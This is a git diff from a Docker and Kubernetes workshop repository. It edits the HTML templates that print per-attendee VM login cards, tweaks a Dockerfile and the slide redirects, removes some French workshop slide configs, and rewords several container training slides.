+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "orchestration workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_swarm -%}
 {%- endif -%}
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
-
 body, table {
     margin: 0;
     padding: 0;
     line-height: 1em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
+    font-size: 14px;
 }
 
 table {
@@ -96,54 +37,24 @@ table {
 div {
     float: left;
     border: 1px dotted black;
-    {% if backside %}
-    height: 31%;
-    {% endif %}
     padding-top: 1%;
     padding-bottom: 1%;
     /* columns * (width+left+right) < 100% */
-    /*
     width: 21.5%;
     padding-left: 1.5%;
     padding-right: 1.5%;
-    */
-    /**/
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-    /**/    
 }
 
 p {
     margin: 0.4em 0 0.4em 0;
 }
 
-div.back {
-	border: 1px dotted white;
-}
-
-div.back p {
-    margin: 0.5em 1em 0 1em;
-}
-
 img {
     height: 4em;
     float: right;
-    margin-right: -0.2em;
+    margin-right: -0.4em;
 }
 
-/*
-img.enix {
-    height: 4.0em;
-    margin-top: 0.4em;
-}
-
-img.kube {
-    height: 4.2em;
-    margin-top: 1.7em;
-}
-*/
-
 .logpass {
     font-family: monospace;
     font-weight: bold;
@@ -158,15 +69,19 @@ img.kube {
 </style></head>
 <body>
 {% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
     <div>
-        <p>{{ intro }}</p>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
         <p>
             <img src="{{ image_src }}" />
             <table>
-            	{% if clusternumber != None %}
-	            <tr><td>cluster:</td></tr>
-	            <tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
-            	{% endif %}
                 <tr><td>login:</td></tr>
                 <tr><td class="logpass">docker</td></tr>
                 <tr><td>password:</td></tr>
@@ -175,44 +90,17 @@ img.kube {
 
         </p>
         <p>
-            {{ listhead }}
+            Your {{ machine_is_or_machines_are }}:
             <table>
                 {% for node in cluster %}
-                <tr>
-                	<td>{{ clusterprefix }}{{ loop.index }}:</td>
-                	<td>{{ node }}</td>
-                </tr>
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
                 {% endfor %}
             </table>
         </p>
-
-        <p>
-        	{{ slides_are_at }}
+        <p>You can find the slides at:
             <center>{{ url }}</center>
         </p>
     </div>
-    {% if loop.index%pagesize==0 or loop.last %}
-        <span class="pagebreak"></span>
-        {% if backside %}
-			{% for x in range(pagesize) %}
-		        <div class="back">
-		        <br/>
-				<p>You got this at the workshop
-				"Getting Started With Kubernetes and Container Orchestration"
-				during QCON London (March 2019).</p>
-				<p>If you liked that workshop,
-				I can train your team or organization
-				on Docker, container, and Kubernetes,
-				with curriculums of 1 to 5 days.
-				</p>
-				<p>Interested? Contact me at:</p>
-				<p>jerome.petazzoni@gmail.com</p>
-				<p>Thank you!</p>
-		        </div>
-			{% endfor %}
-		<span class="pagebreak"></span>
-		{% endif %}
-    {% endif %}
 {% endfor %}
 </body>
 </html>

prepare-vms/templates/enix.html

@@ -0,0 +1,121 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://FIXME.container.training" -%}
+{%- set pagesize = 9 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine virtuelle" -%}
+    {%- set this_or_each = "cette" -%}
+    {%- set plural = "" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "chaque" -%}
+    {%- set plural = "s" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1em;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+p {
+    margin: 0.4em 0 0.4em 0;
+}
+
+img {
+    height: 4em;
+    float: right;
+    margin-right: -0.3em;
+}
+
+img.enix {
+    height: 4.0em;
+    margin-top: 0.4em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
+    <div>
+
+        <p>
+            Voici les informations permettant de se connecter à votre
+	    {{ cluster_or_machine }} pour cette formation.
+	    Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
+	    avec n'importe quel client SSH.
+        </p>
+        <p>
+	    <img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
+            <table>
+                <tr><td>identifiant:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>mot de passe:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+	Adresse{{ plural }} IP :
+	<!--<img class="kube" src="{{ image_src }}" />-->
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>Le support de formation est à l'adresse suivante :
+            <center>{{ url }}</center>
+        </p>
+    </div>
+{% endfor %}
+</body>
+</html>

prepare-vms/templates/jerome.html

@@ -0,0 +1,134 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://qconuk2019.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1.0em;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    height: 31%;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+div.back {
+	border: 1px dotted white;
+}
+
+div.back p {
+    margin: 0.5em 1em 0 1em;
+}
+
+p {
+    margin: 0.4em 0 0.8em 0;
+}
+
+img {
+    height: 5em;
+    float: right;
+    margin-right: 1em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    <div>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
+        <p>
+            <img src="{{ image_src }}" />
+            <table>
+                <tr><td>login:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>password:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+            Your {{ machine_is_or_machines_are }}:
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>You can find the slides at:
+            <center>{{ url }}</center>
+        </p>
+    </div>
+    {% if loop.index%pagesize==0 or loop.last %}
+        <span class="pagebreak"></span>
+	{% for x in range(pagesize) %}
+        <div class="back">
+        <br/>
+		<p>You got this at the workshop
+		"Getting Started With Kubernetes and Container Orchestration"
+		during QCON London (March 2019).</p>
+		<p>If you liked that workshop,
+		I can train your team or organization
+		on Docker, container, and Kubernetes,
+		with curriculums of 1 to 5 days.
+		</p>
+		<p>Interested? Contact me at:</p>
+		<p>jerome.petazzoni@gmail.com</p>
+		<p>Thank you!</p>
+        </div>
+	{% endfor %}
+	<span class="pagebreak"></span>
+    {% endif %}
+{% endfor %}
+</body>
+</html>

prepare-vms/templates/kube101.html

@@ -0,0 +1,106 @@
+{# Feel free to customize or override anything in there! #}
+{%- set url = "http://container.training/" -%}
+{%- set pagesize = 12 -%}
+{%- if clustersize == 1 -%}
+    {%- set workshop_name = "Docker workshop" -%}
+    {%- set cluster_or_machine = "machine" -%}
+    {%- set this_or_each = "this" -%}
+    {%- set machine_is_or_machines_are = "machine is" -%}
+    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
+{%- else -%}
+    {%- set workshop_name = "Kubernetes workshop" -%}
+    {%- set cluster_or_machine = "cluster" -%}
+    {%- set this_or_each = "each" -%}
+    {%- set machine_is_or_machines_are = "machines are" -%}
+    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
+    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
+    {%- set image_src = image_src_kube -%}
+{%- endif -%}
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head><style>
+body, table {
+    margin: 0;
+    padding: 0;
+    line-height: 1em;
+    font-size: 14px;
+}
+
+table {
+    border-spacing: 0;
+    margin-top: 0.4em;
+    margin-bottom: 0.4em;
+    border-left: 0.8em double grey;
+    padding-left: 0.4em;
+}
+
+div {
+    float: left;
+    border: 1px dotted black;
+    padding-top: 1%;
+    padding-bottom: 1%;
+    /* columns * (width+left+right) < 100% */
+    width: 21.5%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+}
+
+p {
+    margin: 0.4em 0 0.4em 0;
+}
+
+img {
+    height: 4em;
+    float: right;
+    margin-right: -0.4em;
+}
+
+.logpass {
+    font-family: monospace;
+    font-weight: bold;
+}
+
+.pagebreak {
+    page-break-after: always;
+    clear: both;
+    display: block;
+    height: 8px;
+}
+</style></head>
+<body>
+{% for cluster in clusters %}
+    {% if loop.index0>0 and loop.index0%pagesize==0 %}
+        <span class="pagebreak"></span>
+    {% endif %}
+    <div>
+
+        <p>
+            Here is the connection information to your very own
+            {{ cluster_or_machine }} for this {{ workshop_name }}.
+            You can connect to {{ this_or_each }} VM with any SSH client.
+        </p>
+        <p>
+            <img src="{{ image_src }}" />
+            <table>
+                <tr><td>login:</td></tr>
+                <tr><td class="logpass">docker</td></tr>
+                <tr><td>password:</td></tr>
+                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
+            </table>
+
+        </p>
+        <p>
+            Your {{ machine_is_or_machines_are }}:
+            <table>
+                {% for node in cluster %}
+                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                {% endfor %}
+            </table>
+        </p>
+        <p>You can find the slides at:
+            <center>{{ url }}</center>
+        </p>
+    </div>
+{% endfor %}
+</body>
+</html>

slides/Dockerfile

@@ -1,4 +1,7 @@
-FROM alpine:3.9
-RUN apk add --no-cache entr py-pip git
+FROM alpine
+RUN apk update
+RUN apk add entr
+RUN apk add py-pip
+RUN apk add git
 COPY requirements.txt .
 RUN pip install -r requirements.txt

slides/_redirects

@@ -1,5 +1,4 @@
 # Uncomment and/or edit one of the the following lines if necessary.
 #/ /kube-halfday.yml.html 200
-#/ /kube-fullday.yml.html 200
+/ /kube-fullday.yml.html 200!
 #/ /kube-twodays.yml.html 200
-/ /alfun.html 200!

slides/alfun-2.yml

@@ -1,73 +0,0 @@
-title: |
-  Containers,
-  Docker,
-  Kubernetes
-  (Partie 2)
-
-#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://alfun-2019-06.container.training/
-
-exclude:
-- self-paced
-
-chapters:
-- shared/title.md
-- shared/toc.md
-# DAY 3
-- - shared/prereqs.md
-  - shared/connecting.md
-  - k8s/versions-k8s.md
-  - shared/sampleapp.md
-  - shared/composedown.md
-  - k8s/kubectlget.md
-  - k8s/kubectlrun.md
-  - k8s/deploymentslideshow.md
-- - k8s/kubectlexpose.md
-  - k8s/shippingimages.md
-  - k8s/buildshiprun-dockerhub.md
-  - k8s/ourapponkube.md
-  - k8s/scalingdockercoins.md
-  - shared/hastyconclusions.md
-  - k8s/daemonset.md
-- - k8s/namespaces.md
-  - |
-    # Exercise — from Compose to Kubernetes
-
-    Let's run the wordsmith app on Kubernetes!
-
-    The code is at: https://github.com/jpetazzo/wordsmith
-  - k8s/kustomize.md
-  - k8s/helm.md
-  #- k8s/create-chart.md
-  - k8s/rollout.md
-- - k8s/healthchecks.md
-  #- k8s/healthchecks-more.md
-  - k8s/kubectlproxy.md
-  - k8s/localkubeconfig.md
-  - k8s/accessinternal.md
-  - k8s/dashboard.md
-  - k8s/setup-k8s.md
-# DAY 4
-- - k8s/volumes.md
-  - k8s/configuration.md
-  - k8s/logs-cli.md
-  - k8s/logs-centralized.md
-  - k8s/prometheus.md
-- - k8s/authn-authz.md
-  - k8s/netpol.md
-  - k8s/podsecuritypolicy.md
-- - k8s/ingress.md
-  - k8s/statefulsets.md
-  - k8s/local-persistent-volumes.md
-  #- k8s/extending-api.md
-- - k8s/resource-limits.md
-  - k8s/metrics-server.md
-  - k8s/cluster-sizing.md
-  - k8s/horizontal-pod-autoscaler.md
-- - k8s/whatsnext.md
-  - k8s/links.md
-  - shared/thankyou.md

slides/alfun-3.yml

@@ -1,22 +0,0 @@
-title: |
-  Containers,
-  Docker,
-  Kubernetes
-  (Extras)
-
-#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://alfun-2019-06.container.training/
-
-exclude:
-- self-paced
-
-chapters:
-- shared/title.md
-- shared/toc.md
-- - containers/Namespaces_Cgroups.md
-  - containers/Copy_On_Write.md
-

slides/alfun.html

@@ -1,5 +0,0 @@
-<p><a href="alfun-1.yml.html">Lundi / Mardi</a></p>
-<p><a href="alfun-2.yml.html">Jeudi / Vendredi</a></p>
-<p><a href="alfun-3.yml.html">Extra slides (container internals)</a></p>
-
-

slides/containers/Ambassadors.md

@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
 * Ad-hoc deployments can use a master-less discovery protocol
   like avahi to register and discover services.
 * It is also possible to do one-shot reconfiguration of the
-  ambassadors. It is slightly less dynamic but has far fewer
+  ambassadors. It is slightly less dynamic but has much less
   requirements.
 * Ambassadors can be used in addition to, or instead of, overlay networks.
 
@@ -186,48 +186,22 @@ Different deployments will use different underlying technologies.
 
 ---
 
-## Some popular service meshes
+## Section summary
 
-... And related projects:
+We've learned how to:
 
-* [Consul Connect](https://www.consul.io/docs/connect/index.html)
-  <br/>
-  Transparently secures service-to-service connections with mTLS.
+* Understand the ambassador pattern and what it is used for (service portability).
 
-* [Gloo](https://gloo.solo.io/)
-  <br/>
-  API gateway that can interconnect applications on VMs, containers, and serverless.
+For more information about the ambassador pattern, including demos on Swarm and ECS: 
+
+* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
+
+* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
+
+Some services meshes and related projects:
 
 * [Istio](https://istio.io/)
-  <br/>
-  A popular service mesh.
 
 * [Linkerd](https://linkerd.io/)
-  <br/>
-  Another popular service mesh.
 
----
-
-## Learning more about service meshes
-
-A few blog posts about service meshes:
-
-* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
-  <br/>
-  Provides historical context: how did we do before service meshes were invented?
-
-* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
-  <br/>
-  Explains the purpose of service meshes. Illustrates some NGINX features.
-
-* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
-  <br/>
-  Includes high-level overview and definitions.
-
-* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
-  <br/>
-  Includes a step-by-step demo of Linkerd.
-
-And a video:
-
-* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
+* [Gloo](https://gloo.solo.io/)

slides/containers/Application_Configuration.md

@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires writing a configuration file. (Obviously!)
+* Requires to write a configuration file. (Obviously!)
 
-* Requires building an image to start the service.
+* Requires to build an image to start the service.
 
-* Requires rebuilding the image to reconfigure the service.
+* Requires to rebuild the image to reconfigure the service.
 
-* Requires rebuilding the image to upgrade the service.
+* Requires to rebuild the image to upgrade the service.
 
 * Configured images can be stored in registries.
 
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
 
 * Allows arbitrary customization and complex configuration files.
 
-* Requires creating a volume for each different configuration.
+* Requires to create a volume for each different configuration.
 
 * Services with identical configurations can use the same volume.
 
-* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
+* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
 
 * Configuration can be generated or edited through another container.
 
@@ -198,4 +198,4 @@ E.g.:
 
 - read the secret on stdin when the service starts,
 
-- pass the secret using an API endpoint.
+- pass the secret using an API endpoint.

slides/containers/Background_Containers.md

@@ -257,7 +257,7 @@ $ docker kill 068 57ad
 The `stop` and `kill` commands can take multiple container IDs.
 
 Those containers will be terminated immediately (without
-the 10-second delay).
+the 10 seconds delay).
 
 Let's check that our containers don't show up anymore:
 

slides/containers/Cmd_And_Entrypoint.md

@@ -222,16 +222,16 @@ CMD ["hello world"]
 Let's build it:
 
 ```bash
-$ docker build -t myfiglet .
+$ docker build -t figlet .
 ...
 Successfully built 6e0b6a048a07
-Successfully tagged myfiglet:latest
+Successfully tagged figlet:latest
 ```
 
 Run it without parameters:
 
 ```bash
-$ docker run myfiglet
+$ docker run figlet
  _          _   _                             _        
 | |        | | | |                           | |    |  
 | |     _  | | | |  __             __   ,_   | |  __|  
@@ -246,7 +246,7 @@ $ docker run myfiglet
 Now let's pass extra arguments to the image.
 
 ```bash
-$ docker run myfiglet hola mundo
+$ docker run figlet hola mundo
  _           _                                               
 | |         | |                                      |       
 | |     __  | |  __,     _  _  _           _  _    __|   __  
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
 
 What if we want to run a shell in our container?
 
-We cannot just do `docker run myfiglet bash` because
+We cannot just do `docker run figlet bash` because
 that would just tell figlet to display the word "bash."
 
 We use the `--entrypoint` parameter:
 
 ```bash
-$ docker run -it --entrypoint bash myfiglet
+$ docker run -it --entrypoint bash figlet
 root@6027e44e2955:/# 
 ```
 

slides/containers/Container_Engines.md

@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * No notion of image (container filesystems have to be managed manually).
 
-* Networking has to be set up manually.
+* Networking has to be setup manually.
 
 ---
 
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
 
 * Strong emphasis on security (through privilege separation).
 
-* Networking has to be set up separately (e.g. through CNI plugins).
+* Networking has to be setup separately (e.g. through CNI plugins).
 
 * Partial image management (pull, but no push).
 
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
 
 * Basic image support (tar archives and raw disk images).
 
-* Network has to be set up manually.
+* Network has to be setup manually.
 
 ---
 
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
 
 * Run each container in a lightweight virtual machine.
 
-* Requires running on bare metal *or* with nested virtualization.
+* Requires to run on bare metal *or* with nested virtualization.
 
 ---
 

slides/containers/Container_Network_Model.md

@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
 
 * `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
 
-* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
 
 ---
 
@@ -528,9 +528,7 @@ Very short instructions:
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`
 
-If you want to learn more about Swarm mode, you can check
-[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
-or [these slides](https://container.training/swarm-selfpaced.yml.html).
+See https://jpetazzo.github.io/container.training for all the deets about clustering!
 
 ---
 
@@ -556,7 +554,7 @@ General idea:
 
 * So far, we have specified which network to use when starting the container.
 
-* The Docker Engine also allows connecting and disconnecting while the container is running.
+* The Docker Engine also allows to connect and disconnect while the container runs.
 
 * This feature is exposed through the Docker API, and through two Docker CLI commands:
 

slides/containers/Exercise_Composefile.md

@@ -1,5 +0,0 @@
-# Exercise — writing a Compose file
-
-Let's write a Compose file for the wordsmith app!
-
-The code is at: https://github.com/jpetazzo/wordsmith

slides/containers/Exercise_Dockerfile_Advanced.md

@@ -1,9 +0,0 @@
-# Exercise — writing better Dockerfiles
-
-Let's update our Dockerfiles to leverage multi-stage builds!
-
-The code is at: https://github.com/jpetazzo/wordsmith
-
-Use a different tag for these images, so that we can compare their sizes.
-
-What's the size difference between single-stage and multi-stage builds?

slides/containers/Exercise_Dockerfile_Basic.md

@@ -1,5 +0,0 @@
-# Exercise — writing Dockerfiles
-
-Let's write Dockerfiles for an existing application!
-
-The code is at: https://github.com/jpetazzo/wordsmith

slides/containers/First_Containers.md

@@ -203,90 +203,4 @@ bash: figlet: command not found
 
 * The basic Ubuntu image was used, and `figlet` is not here.
 
----
-
-## Where's my container?
-
-* Can we reuse that container that we took time to customize?
-
-  *We can, but that's not the default workflow with Docker.*
-
-* What's the default workflow, then?
-
-  *Always start with a fresh container.*
-  <br/>
-  *If we need something installed in our container, build a custom image.*
-
-* That seems complicated!
-
-  *We'll see that it's actually pretty easy!*
-
-* And what's the point?
-
-  *This puts a strong emphasis on automation and repeatability. Let's see why ...*
-
----
-
-## Pets vs. Cattle
-
-* In the "pets vs. cattle" metaphor, there are two kinds of servers.
-
-* Pets:
-
-  * have distinctive names and unique configurations
-
-  * when they have an outage, we do everything we can to fix them
-
-* Cattle:
-
-  * have generic names (e.g. with numbers) and generic configuration
-
-  * configuration is enforced by configuration management, golden images ...
-
-  * when they have an outage, we can replace them immediately with a new server
-
-* What's the connection with Docker and containers?
-
----
-
-## Local development environments
-
-* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
-
-  * create VM from base template (Ubuntu, CentOS...)
-
-  * install packages, set up environment
-
-  * work on project
-
-  * when done, shut down VM
-
-  * next time we need to work on project, restart VM as we left it
-
-  * if we need to tweak the environment, we do it live
-
-* Over time, the VM configuration evolves, diverges.
-
-* We don't have a clean, reliable, deterministic way to provision that environment.
-
----
-
-## Local development with Docker
-
-* With Docker, the workflow looks like this:
-
-  * create container image with our dev environment
-
-  * run container with that image
-
-  * work on project
-
-  * when done, shut down container
-
-  * next time we need to work on project, start a new container
-
-  * if we need to tweak the environment, we create a new image
-
-* We have a clear definition of our environment, and can share it reliably with others.
-
-* Let's see in the next chapters how to bake a custom image with `figlet`!
+* We will see in the next chapters how to bake a custom image with `figlet`.

slides/containers/Initial_Images.md

@@ -70,9 +70,8 @@ class: pic
 
 * An image is a read-only filesystem.
 
-* A container is an encapsulated set of processes,
-
-  running in a read-write copy of that filesystem.
+* A container is an encapsulated set of processes running in a
+  read-write copy of that filesystem.
 
 * To optimize container boot time, *copy-on-write* is used
   instead of regular copy.
@@ -178,11 +177,8 @@ Let's explain each of them.
 
 ## Root namespace
 
-The root namespace is for official images.
-
-They are gated by Docker Inc.
-
-They are generally authored and maintained by third parties.
+The root namespace is for official images. They are put there by Docker Inc.,
+but they are generally authored and maintained by third parties.
 
 Those images include:
 
@@ -192,7 +188,7 @@ Those images include:
 
 * Ready-to-use components and services, like redis, postgresql...
 
-* Over 150 at this point!
+* Over 130 at this point!
 
 ---
 

slides/containers/Local_Development_Workflow.md

@@ -156,7 +156,7 @@ Option 3:
 
 * Use a *volume* to mount local files into the container
 * Make changes locally
-* Changes are reflected in the container
+* Changes are reflected into the container
 
 ---
 
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
 
 * `namer` is the name of the image we will run.
 
-* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
+* We don't specify a command to run because it is already set in the Dockerfile.
 
 Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
 
@@ -192,7 +192,7 @@ The flag structure is:
 [host-path]:[container-path]:[rw|ro]
 ```
 
-* `[host-path]` and `[container-path]` are created if they don't exist.
+* If `[host-path]` or `[container-path]` doesn't exist it is created.
 
 * You can control the write status of the volume with the `ro` and
   `rw` options.
@@ -255,13 +255,13 @@ color: red;
 
 * Volumes are *not* copying or synchronizing files between the host and the container.
 
-* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
+* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
 
 * Bind mounts are *kind of* similar to symbolic links, but at a very different level.
 
 * Changes made on the host or on the container will be visible on the other side.
 
-  (Under the hood, it's the same file anyway.)
+  (Since under the hood, it's the same file on both anyway.)
 
 ---
 
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
 
 --
 
-* Let's majorly mess up our container.
+* Let's mess up majorly with our container.
 
   (Remove files or whatever.)
 
@@ -319,7 +319,7 @@ and *canary deployments*.
    <br/>
    Use the `-v` flag to mount our source code inside the container.
 
-3. Edit the source code outside the container, using familiar tools.
+3. Edit the source code outside the containers, using regular tools.
    <br/>
    (vim, emacs, textmate...)
 

slides/containers/Namespaces_Cgroups.md

@@ -86,13 +86,13 @@ class: extra-details, deep-dive
 
   - the `unshare()` system call.
 
-- The Linux tool `unshare` allows doing that from a shell.
+- The Linux tool `unshare` allows to do that from a shell.
 
 - A new process can re-use none / all / some of the namespaces of its parent.
 
 - It is possible to "enter" a namespace with the `setns()` system call.
 
-- The Linux tool `nsenter` allows doing that from a shell.
+- The Linux tool `nsenter` allows to do that from a shell.
 
 ---
 
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
 
 - gethostname / sethostname
 
-- Allows setting a custom hostname for a container.
+- Allows to set a custom hostname for a container.
 
 - That's (mostly) it!
 
-- Also allows setting the NIS domain.
+- Also allows to set the NIS domain.
 
   (If you don't know what a NIS domain is, you don't have to worry about it!)
 
@@ -392,13 +392,13 @@ class: extra-details
 
 - Processes can have their own root fs (à la chroot).
 
-- Processes can also have "private" mounts. This allows:
+- Processes can also have "private" mounts. This allows to:
 
-  - isolating `/tmp` (per user, per service...)
+  - isolate `/tmp` (per user, per service...)
 
-  - masking `/proc`, `/sys` (for processes that don't need them)
+  - mask `/proc`, `/sys` (for processes that don't need them)
 
-  - mounting remote filesystems or sensitive data,
+  - mount remote filesystems or sensitive data,
     <br/>but make it visible only for allowed processes
 
 - Mounts can be totally private, or shared.
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
 
 ## User namespace
 
-- Allows mapping UID/GID; e.g.:
+- Allows to map UID/GID; e.g.:
 
   - UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
   - UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
